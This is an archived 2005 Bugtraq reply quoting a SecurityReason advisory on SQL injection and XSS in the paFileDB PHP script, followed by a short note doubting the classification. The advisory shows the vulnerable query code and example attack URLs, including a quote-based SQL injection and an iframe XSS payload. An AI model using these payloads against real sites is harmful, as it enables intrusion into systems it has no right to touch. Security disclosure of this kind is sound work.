The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Not SQL injection and XSS in paFileDB?


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: 12 Mar 2005 21:01:47 -0000
From: saudi linux <ksa2ksa@yahoo.com.>
To: [email protected]
Subject: Not SQL injection and XSS in paFileDB?
X-Virus-Scanned: antivirus-gw at tyumen.ru

In-Reply-To: <20050312182442.22116.qmail@www.securityfocus.com.>

>Received: (qmail 27749 invoked from network); 12 Mar 2005 19:45:27 -0000
>Received: from outgoing.securityfocus.com (HELO outgoing2.securityfocus.com) (205.206.231.26)
>  by mail.securityfocus.com with SMTP; 12 Mar 2005 19:45:27 -0000
>Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
>	by outgoing2.securityfocus.com (Postfix) with QMQP
>	id 6C68014544F; Sat, 12 Mar 2005 12:52:18 -0700 (MST)
>Mailing-List: contact [email protected]; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@securityfocus.com.>
>List-Help: <mailto:bugtraq-help@securityfocus.com.>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com.>
>List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com.>
>Delivered-To: mailing list [email protected]
>Delivered-To: moderator for [email protected]
>Received: (qmail 32145 invoked from network); 12 Mar 2005 04:00:48 -0000
>Date: 12 Mar 2005 18:24:42 -0000
>Message-ID: <20050312182442.22116.qmail@www.securityfocus.com.>
>Content-Type: text/plain
>Content-Disposition: inline
>Content-Transfer-Encoding: binary
>MIME-Version: 1.0
>X-Mailer: MIME-tools 5.411 (Entity 5.404)
>From: SecurityReason <sp3x@securityreason.com.>
>To: [email protected]
>Subject: [SECURITYREASON.COM]  SQL injection and XSS in paFileDB
>
>
>
>-=[ SecurityReason-2005-SRA#03 ]=-
>
>-=[ SQL injection and XSS in paFileDB ]=-
>
>Author: sp3x
>Date: 12 March 2005
>
>Affected software :
>===================
>paFileDB version : =>3.1
>
>Description :
>=============
>
>paFileDB is designed to allow webmasters have a database of files for download on their site. 
>To add a download, all you do is upload the file using FTP or whatever method you use, log
>into paFileDB's admin center, and fill out a form to add a file. paFileDB lets you edit and
>delete the files too. 
>No more messing with a bunch of HTML pages for a file database on your site! 
>Using speedy MySQL for storing data, and powerful PHP for processing everything, paFileDB is
>one of the best and easiest ways to manage files!
>
>SQL injection:
>=======================
>
>/includes/viewall.php
>/includes/category.php
>
>Code:
>-------------------------------------------------------------------------------------------------
>if ($sortby == "name") {
>        $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files WHERE file_pin = '0' ORDER BY file_name 
>
>ASC LIMIT $start,20", 0);
>}
>if ($sortby == "date") {
>        $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files WHERE file_pin = '0' ORDER BY file_time 
>
>DESC LIMIT $start,20", 0);
>}
>if ($sortby == "downloads") {
>        $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files WHERE file_pin = '0' ORDER BY file_dls 
>
>DESC LIMIT $start,20", 0);
>}
>if ($sortby == "rating") {
>        $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files WHERE file_pin = '0' ORDER BY 
>
>(file_rating/file_totalvotes - 1) DESC LIMIT $start,20", 0);
>}
>--------------------------------------------------------------------------------------------------
>
>As we can see the $start variable is vuln for sql injection attack.
>But this sql injection for now is not critical , why ? because if we want to inject malicious code to sql sentence 
>
>after "ORDER BY" or after "LIMIT", then in current MySql versions, all we can do, is to fail the sql request. No 
>
>UNION-s etc. When we try to inject sql sentence we get : "Wrong usage of UNION and ORDER BY Error number: 1221" so we 
>
>must wait When Mysql version 4.1 will be widely used then we can have something like this - "ORDER BY desc ASC LIMIT 
>
>(SELECT our_table FROM pafiledb_admin)...".
>
>Examples:
>=========
>
>Sql injection:
>--------------
>http://&#091;target]/[pafiledb_dir]/pafiledb.php?action=viewall&start='&sortby=rating
>http://&#091;target]/[pafiledb_dir]/pafiledb.php?action=category&start='&sortby=rating
>
>error message :
>---------------
>paFileDB was unable to successfully run a MySQL query.
>MySQL Returned this error: You have an error in your SQL syntax near '\',20' at line 1 Error number: 1064
>The query that caused this error was: SELECT * FROM pafiledb_files WHERE file_pin = '0' ORDER BY 
>
>(file_rating/file_totalvotes - 1) DESC LIMIT \',20
>
>Also in this error message we can see the [prefix] pafiledb tables that should be hidden :) 
>And we can insert XSS code in error message for example :
>
>Cros Site Scripting (XSS):
>--------------------------
>
>http://&#091;target]/[pafiledb_dir]/pafiledb.php?action=viewall&start="><iframe%20src=http://www.securityreason.com>;</iframe
>
>>&sortby=rating
>http://&#091;target]/[pafiledb_dir]/pafiledb.php?action=category&start="><iframe%20src=http://www.securityreason.com>;</ifram
>
>e>&sortby=date
>
>error message :
>---------------
>paFileDB was unable to successfully run a MySQL query.
>MySQL Returned this error: You have an error in your SQL syntax near '[Our XSS]',20' at line 1 Error number: 1064
>The query that caused this error was: SELECT * FROM pafiledb_files WHERE file_pin = '0' ORDER BY 
>
>(file_rating/file_totalvotes - 1) DESC LIMIT [Our XSS]',20
>
>How to fix :
>============
>
>Download the new version of the script or update.
>
>Vendor :
>========
>
>No respond
>
>
>Greetz :
>========
>
>Special greetz : cXIb8O3 , pkw :]
>
>Contact :
>=========
>
>sp3x[at]securityreason[dot].com
>www.securityreason.com
>
Dear sp3x 

are you sure this is SQL injection or XSS ?

i do not think it's SQL injection becuse u use XSS Vuln in your Bug 

i hope you read more info about SQL injection


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру